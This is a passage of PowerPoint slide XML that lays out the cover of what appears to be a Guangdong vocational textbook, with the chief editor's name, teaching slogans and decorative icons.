          <p:cNvPr id="20" name="直接连接符 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5634990" y="2847975"/>
            <a:ext cx="4752340" cy="3810"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="0070C0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="451485"/>
            <a:ext cx="4021455" cy="301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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>广东省首批十四五规划教材</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4624705" y="5731510"/>
            <a:ext cx="2943225" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6736715" y="4239895"/>
            <a:ext cx="2548255" cy="56007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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>主编：张燕燕</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5238115" y="3315970"/>
            <a:ext cx="5756910" cy="3219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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>课程思政</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>岗课赛证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>项目式教学</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>任务驱动</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                  <a:schemeClr val="dk1">
                    <a:alpha val="40000"/>
                  </a:schemeClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5" descr="蝴蝶结"/>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2184400" y="1409700"/>
            <a:ext cx="401955" cy="401955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="茶杯"/>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3098800" y="1409700"/>
            <a:ext cx="296545" cy="296545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8" descr="衣架"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId13"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4013200" y="1409700"/>
            <a:ext cx="495935" cy="495935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11" descr="新建文档"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId15"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="523875" y="1791335"/>
            <a:ext cx="491490" cy="491490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12" descr="箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId16">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId17"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2459355" y="3238500"/>
            <a:ext cx="492760" cy="492760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13" descr="箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId18">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId19"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2266315" y="1922145"/>
            <a:ext cx="408305" cy="408305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="图片 15" descr="饼图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId20">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId21"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1443355" y="1761490"/>
            <a:ext cx="562610" cy="562610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="图片 16" descr="线性数据图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId22">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId23"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1699260" y="3030855"/>
            <a:ext cx="401955" cy="401955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="图片 17" descr="饼图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId24">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId25"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3604260" y="3141980"/>
            <a:ext cx="495935" cy="495935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18" descr="循环箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId26">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId27"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="523875" y="2791460"/>
            <a:ext cx="523875" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="图片 21" descr="信"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId28">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId29"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="2324100"/>
            <a:ext cx="467360" cy="467360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22" descr="声音"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId30">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId31"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="2476500"/>
            <a:ext cx="467360" cy="467360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="图片 23" descr="上学"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId32">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId33"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="2324100"/>
            <a:ext cx="574040" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="图片 24" descr="上学"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId34">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId35"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3604260" y="2545080"/>
            <a:ext cx="527685" cy="527685"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="图片 25" descr="上课"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId36">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId37"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4054475" y="1998980"/>
            <a:ext cx="476885" cy="476885"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="图片 26" descr="皇冠"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId38">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId39"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1047750" y="3238500"/>
            <a:ext cx="523875" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="图片 27" descr="纸笔"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId40">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId41"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
